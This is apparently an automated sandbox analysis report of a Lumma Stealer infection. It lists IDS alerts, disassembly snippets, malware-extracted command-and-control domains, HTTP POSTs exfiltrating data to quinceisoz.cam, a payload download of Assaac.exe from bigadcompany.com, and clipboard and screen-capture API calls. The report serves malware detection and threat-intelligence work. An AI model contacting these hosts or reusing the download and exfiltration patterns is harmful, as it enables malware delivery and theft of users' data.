                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp al, 2Eh19_2_0042860F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edi, ecx19_2_00426BC6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h19_2_00417ED0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-00000094h]19_2_00419690
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax19_2_0041A690
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [eax], cl19_2_0040CF40
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [eax], cl19_2_0040CF40
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ecx], bl19_2_0040E777
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]19_2_00407700
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]19_2_00407700
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movsx edx, byte ptr [esi+eax]19_2_0041EFE0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx19_2_00421790

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49978 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49978 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49979 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49977 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49977 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49984 -> 104.21.112.1:443
                Source: Malware configuration extractorURLs: femalsabler.shop
                Source: Malware configuration extractorURLs: soundtappysk.shop
                Source: Malware configuration extractorURLs: quinceisoz.cam
                Source: Malware configuration extractorURLs: versersleep.shop
                Source: Malware configuration extractorURLs: robinsharez.shop
                Source: Malware configuration extractorURLs: apporholis.shop
                Source: Malware configuration extractorURLs: handscreamny.shop
                Source: Malware configuration extractorURLs: crowdwarek.shop
                Source: Malware configuration extractorURLs: chipdonkeruz.shop
                Source: global trafficHTTP traffic detected: GET /kunnar.png HTTP/1.1Host: web.klipdywoziy.shopConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49978 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49979 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49981 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49977 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49983 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49982 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49980 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49984 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49985 -> 192.250.235.30:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: quinceisoz.cam
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: quinceisoz.cam
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=65JI2K73L1TMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12808Host: quinceisoz.cam
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NQ8CFUDZVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15022Host: quinceisoz.cam
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=24HSIUEZS9V3JTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20377Host: quinceisoz.cam
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=X6R860G69PEVMYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1210Host: quinceisoz.cam
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=95TPMI7T1E56User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585408Host: quinceisoz.cam
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: quinceisoz.cam
                Source: global trafficHTTP traffic detected: GET /Assaac.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bigadcompany.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /kunnar.png HTTP/1.1Host: web.klipdywoziy.shopConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Assaac.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bigadcompany.com
                Source: global trafficDNS traffic detected: DNS query: web.klipdywoziy.shop
                Source: global trafficDNS traffic detected: DNS query: quinceisoz.cam
                Source: global trafficDNS traffic detected: DNS query: bigadcompany.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: quinceisoz.cam
                Source: powershell.exe, 0000000C.00000002.1318983067.0000000006E41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                Source: powershell.exe, 00000007.00000002.3776275081.0000000006DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftJn9
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/Assaac;component/MainWindow.xaml
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/Assaac;component/Picture/img_cake.png
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A58514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/Assaac;component/Picture/pic_good.png
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/Assaac;component/Picture/pic_tiz.ico
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/Assaac;component/app.xaml
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/MainWindow.xaml
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Picture/img_cake.png
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A58514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Picture/pic_good.png
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Picture/pic_tiz.ico
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/app.xaml
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.baml
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/mainwindow.baml
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/picture/img_cake.png
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A58514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/picture/pic_good.png
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/picture/pic_tiz.ico
                Source: powershell.exe, 00000007.00000002.3766668638.000000000554C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1316974916.000000000567E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2173513151.0000000005B3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000D.00000002.2173513151.0000000004C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000007.00000002.3710439009.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1324265227.0000000005374000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1313179671.0000000004611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2173513151.0000000004AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000000.2302983309.0000026A56552000.00000002.00000001.01000000.0000000E.sdmp, 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe.19.drString found in binary or memory: http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLOpen
                Source: powershell.exe, 0000000D.00000002.2173513151.0000000004C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 0000000A.00000002.1324265227.0000000005346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6LR
                Source: powershell.exe, 00000007.00000002.3710439009.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1324265227.0000000005354000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1313179671.0000000004611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2173513151.0000000004AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000013.00000002.3705156170.00000000057F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bigadcompany.com/
                Source: powershell.exe, 00000013.00000002.3702752093.0000000003577000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3698386324.000000000350B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bigadcompany.com/Assaac.exe
                Source: powershell.exe, 00000013.00000002.3702752093.0000000003577000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bigadcompany.com/Assaac.exe4c
                Source: powershell.exe, 00000013.00000002.3694595921.0000000002F9A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bigadcompany.com/Assaac.exeebKit/537.36
                Source: powershell.exe, 00000013.00000002.3705156170.00000000057F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bigadcompany.com/L_
                Source: powershell.exe, 00000013.00000002.3705156170.00000000057F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bigadcompany.com/t_
                Source: powershell.exe, 0000000D.00000002.2173513151.0000000005B3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000D.00000002.2173513151.0000000005B3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000D.00000002.2173513151.0000000005B3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 0000000D.00000002.2173513151.0000000004C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000000.2302983309.0000026A56552000.00000002.00000001.01000000.0000000E.sdmp, 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe.19.drString found in binary or memory: https://github.com/rsms/inter)InterBold3.019;RSMS;Inter-BoldInter
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000000.2302983309.0000026A56552000.00000002.00000001.01000000.0000000E.sdmp, 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe.19.drString found in binary or memory: https://ipapi.co/xml
                Source: powershell.exe, 00000007.00000002.3766668638.000000000554C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1316974916.000000000567E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2173513151.0000000005B3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000013.00000002.3702752093.0000000003577000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://quinceisoz.cam/api
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000000.2302983309.0000026A56552000.00000002.00000001.01000000.0000000E.sdmp, 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe.19.drString found in binary or memory: https://rsms.me/This
                Source: powershell.exe, 0000000D.00000002.2173513151.0000000004C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.klipdywoziy.shop
                Source: powershell.exe, 0000000D.00000002.2172771396.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2173513151.0000000004C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.klipdywoziy.shop/kunnar.png
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49977 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49978 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49979 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49980 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49981 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49982 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49983 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49984 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.250.235.30:443 -> 192.168.2.7:49985 version: TLS 1.2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00436080 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,19_2_00436080
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_05601000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,19_2_05601000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00436080 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,19_2_00436080
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00436260 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,19_2_00436260

                System Summary

                barindex
                Source: Process Memory Space: powershell.exe PID: 7324, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7700, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe.19.dr, thisRectangleWord.csLarge array initialization: thisRectangleWord: array initializer size 2048
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BCAD1013_2_02BCAD10
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BC920813_2_02BC9208
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BCB24413_2_02BCB244
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BC832813_2_02BC8328
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BC831813_2_02BC8318
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BCA89813_2_02BCA898
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BCA89213_2_02BCA892
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BC91F813_2_02BC91F8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BCB16C13_2_02BCB16C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BC06F813_2_02BC06F8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BCAFD213_2_02BCAFD2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BCAF1013_2_02BCAF10
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BC070813_2_02BC0708
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BCADAC13_2_02BCADAC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BCADA613_2_02BCADA6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BCADFC13_2_02BCADFC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BCADF713_2_02BCADF7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BC0DC013_2_02BC0DC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02BCAD0013_2_02BCAD00
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02C9AB4813_2_02C9AB48
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02C9D26A13_2_02C9D26A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_06BFBC4813_2_06BFBC48
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_06BFC5D013_2_06BFC5D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072E26CB13_2_072E26CB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072E8E6013_2_072E8E60
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072E8E5013_2_072E8E50
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072E0D6813_2_072E0D68
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072E0D4713_2_072E0D47
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072E6C9813_2_072E6C98
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_072E6C9213_2_072E6C92
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0806580913_2_08065809
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0806584013_2_08065840
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0806D10013_2_0806D100
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08072E5813_2_08072E58
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042105019_2_00421050
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043B12019_2_0043B120
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00408A0019_2_00408A00
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0040B29019_2_0040B290
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0040E29019_2_0040E290
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041750619_2_00417506
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00424D8A19_2_00424D8A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00427E3019_2_00427E30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_004126A019_2_004126A0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00410F5619_2_00410F56
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043404019_2_00434040
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041D81019_2_0041D810
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043202A19_2_0043202A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_004428D019_2_004428D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_004060F019_2_004060F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043A8F019_2_0043A8F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043F09019_2_0043F090
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042B14119_2_0042B141
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0041B95019_2_0041B950
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042D96019_2_0042D960
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0042716019_2_00427160
